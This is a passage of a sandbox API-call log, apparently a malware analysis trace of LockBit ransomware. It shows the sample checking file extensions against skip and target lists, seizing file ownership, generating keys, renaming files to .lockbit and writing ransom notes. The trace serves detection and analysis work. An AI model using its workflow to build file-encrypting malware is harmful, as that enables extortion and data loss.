-1 [0082.481] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.481] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.481] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.481] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.481] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.481] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.481] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.481] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.481] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.481] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.481] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0082.481] lstrcmpiW (lpString1="ntldr", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0082.481] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0082.481] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0082.481] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0082.481] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0082.481] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0082.481] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\") returned="" [0082.481] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_ButtonGraphic.png") returned=".png" [0082.482] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.482] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.482] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.482] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.482] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.482] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.482] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.482] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.482] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.482] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.482] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.482] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.482] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.482] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.482] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.482] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.482] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.482] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.482] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.482] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.482] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.482] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.483] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.483] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.483] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.483] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.483] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.483] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.483] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_ButtonGraphic.png.lockbit") returned 90 [0082.483] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.484] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.484] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.484] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.484] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.484] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.485] RtlFreeAnsiString (AnsiString="\\") [0082.485] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0082.485] malloc (_Size=0x200) returned 0x77d800 [0082.485] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.485] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.485] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.485] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.485] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.486] CloseHandle (hObject=0x3c4) returned 1 [0082.486] free (_Block=0x77d800) [0082.486] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0082.486] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.486] malloc (_Size=0x40068) returned 0x2031ed0 [0082.487] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x2031ee8 | out: lpFileSize=0x2031ee8*=4955) returned 1 [0082.487] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.488] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.488] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f04, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f04) returned 0x0 [0082.488] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.488] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.488] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f14, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f14) returned 0x0 [0082.488] ReadFile (in: hFile=0x3c4, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 1 [0082.502] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.502] malloc (_Size=0xca) returned 0x77d800 [0082.502] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xca, FileInformationClass=0xa) returned 0x0 [0082.503] free (_Block=0x77d800) [0082.503] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge") returned 1 [0082.503] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\Restore-My-Files.txt") returned 72 [0082.503] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.503] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fd5a218, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fd5a218, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d3393fd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0082.504] lstrcmpiW (lpString1=".", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0082.504] lstrcmpiW (lpString1="..", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0082.504] PathFindExtensionW (pszPath="NavigationUp_SelectionSubpicture.png") returned=".png" [0082.504] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.504] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.504] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.504] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.504] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.504] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.504] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.504] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.504] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.504] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.504] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.504] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.504] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.504] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.504] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.504] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.504] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.504] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.504] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.505] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.505] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.505] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.505] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.505] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.505] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.505] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.505] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.505] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.505] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.505] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.505] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.505] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.505] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.505] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.505] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.505] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.505] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.505] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.505] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.505] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.505] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.506] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.506] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.506] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.506] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.506] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.506] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.506] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0082.506] lstrcmpiW (lpString1="ntldr", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0082.506] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0082.506] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0082.506] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0082.506] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0082.506] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0082.506] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\") returned="" [0082.506] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_SelectionSubpicture.png") returned=".png" [0082.506] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.506] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.506] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.506] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.506] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.506] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.506] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.507] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.507] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.507] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.507] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.507] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.507] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.507] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.507] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.507] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.507] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.507] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.507] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.507] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.507] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.507] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.507] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.507] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.507] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.507] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.507] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.507] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.507] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_SelectionSubpicture.png.lockbit") returned 96 [0082.507] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.508] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.508] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.508] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.509] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.509] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.509] RtlFreeAnsiString (AnsiString="\\") [0082.509] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c0) returned 0x0 [0082.509] malloc (_Size=0x200) returned 0x77d800 [0082.509] NtQueryInformationToken (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.509] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.509] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.509] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.510] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.510] CloseHandle (hObject=0x3c0) returned 1 [0082.510] free (_Block=0x77d800) [0082.510] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0082.510] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.511] malloc (_Size=0x40068) returned 0x3d70048 [0082.512] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=3081) returned 1 [0082.512] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.512] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.512] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0082.512] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.513] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0082.513] ReadFile (in: hFile=0x3c0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0082.521] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.521] malloc (_Size=0xd6) returned 0x77d800 [0082.521] NtSetInformationFile (FileHandle=0x3c0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xd6, FileInformationClass=0xa) returned 0x0 [0082.522] free (_Block=0x77d800) [0082.522] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge") returned 1 [0082.522] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\Restore-My-Files.txt") returned 72 [0082.522] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.522] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc9bb47, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fc9bb47, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d3393fd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6c8d, dwReserved0=0x0, dwReserved1=0x0, cFileName="vintage.png", cAlternateFileName="")) returned 1 [0082.522] lstrcmpiW (lpString1=".", lpString2="vintage.png") returned -1 [0082.522] lstrcmpiW (lpString1="..", lpString2="vintage.png") returned -1 [0082.522] PathFindExtensionW (pszPath="vintage.png") returned=".png" [0082.522] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.522] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.522] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.522] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.522] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.523] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.523] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.523] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.523] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.523] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.523] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.523] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.523] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.523] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.523] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.523] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.523] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.523] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.523] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.523] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.523] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.523] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.523] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.523] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.523] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.523] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.523] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.523] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.524] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.524] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.524] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.524] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.524] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.524] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.524] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.524] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.524] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.524] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.524] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.524] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.524] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.524] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.524] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.524] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.524] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.524] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.524] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.524] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="vintage.png") returned -1 [0082.524] lstrcmpiW (lpString1="ntldr", lpString2="vintage.png") returned -1 [0082.524] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="vintage.png") returned -1 [0082.525] lstrcmpiW (lpString1="bootsect.bak", lpString2="vintage.png") returned -1 [0082.525] lstrcmpiW (lpString1="autorun.inf", lpString2="vintage.png") returned -1 [0082.525] lstrcmpiW (lpString1="thumbs.db", lpString2="vintage.png") returned -1 [0082.525] lstrcmpiW (lpString1="iconcache.db", lpString2="vintage.png") returned -1 [0082.525] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\") returned="" [0082.525] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD 